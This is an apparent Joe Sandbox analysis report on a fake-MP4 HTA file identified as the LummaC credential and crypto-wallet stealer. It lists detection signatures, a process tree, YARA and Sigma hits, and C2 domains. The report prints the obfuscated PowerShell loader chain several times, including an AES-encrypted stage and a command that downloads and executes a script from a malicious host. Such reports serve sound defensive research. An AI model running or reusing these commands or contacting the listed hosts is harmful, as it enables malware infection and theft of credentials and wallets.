Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
web44.mp4.hta

Overview

General Information

Sample name:web44.mp4.hta
Analysis ID:1583047
MD5:af46bc7df8441c09296666f0053fb000
SHA1:f193e30afdc9a54afb68808cd37bc240ec29618d
SHA256:d734e7c79310f56620a9243f1e3418e15fb507dec460b801eb0e14a7baa145c5
Tags:EmmenhtalFakeCaptchaFakeMP4htauser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Potentially malicious time measurement code found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6616 cmdline: mshta.exe "C:\Users\user\Desktop\web44.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A745966437058494F437867616E6175')),[byte[]]::new(16)).TransformFinalBlock($mBfyr,0,$mBfyr.Length)); & $AjiG.Substring(0,3) $AjiG.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2108 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1196 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["noisercluch.click", "screwamusresz.buzz", "hummskitnj.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "inherineau.buzz", "appliacnesot.buzz"], "Build id": "WG6I6S--web44"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000002.2455403030.0000000006E00000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: powershell.exe PID: 7164INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x8ccb:$b1: ::WriteAllBytes(
        • 0x9598:$b1: ::WriteAllBytes(
        • 0x11c5:$s1: -join
        • 0x1de7:$s1: -join
        • 0x8d80:$s1: -join
        • 0x964d:$s1: -join
        • 0x1f822:$s1: -join
        • 0x2ba8d:$s1: -join
        • 0x2c6bc:$s1: -join
        • 0x2d528:$s1: -join
        • 0x60e6e:$s1: -join
        • 0x69e0e:$s1: -join
        • 0x77617:$s1: -join
        • 0x78237:$s1: -join
        • 0x9ed9e:$s1: -join
        • 0xabdb0:$s1: -join
        • 0xb9b2c:$s1: -join
        • 0xc6c01:$s1: -join
        • 0xc9fd3:$s1: -join
        • 0xca685:$s1: -join
        • 0xcc176:$s1: -join
        Process Memory Space: powershell.exe PID: 2108INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x314083:$b2: ::FromBase64String(
        • 0x314007:$s1: -join
        • 0x3abd3b:$s1: -join
        • 0x68e6a7:$s1: -join
        • 0x68f031:$s1: -join
        • 0x6ff21a:$s1: -join
        • 0x70c2ef:$s1: -join
        • 0x70f6c1:$s1: -join
        • 0x70fd73:$s1: -join
        • 0x711864:$s1: -join
        • 0x713a6a:$s1: -join
        • 0x714291:$s1: -join
        • 0x714b01:$s1: -join
        • 0x71523c:$s1: -join
        • 0x71526e:$s1: -join
        • 0x7152b6:$s1: -join
        • 0x7152d5:$s1: -join
        • 0x715b25:$s1: -join
        • 0x715ca1:$s1: -join
        • 0x715d19:$s1: -join
        • 0x715dac:$s1: -join
        Process Memory Space: powershell.exe PID: 1196JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            4.2.powershell.exe.6e00000.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A74596
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A74596
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957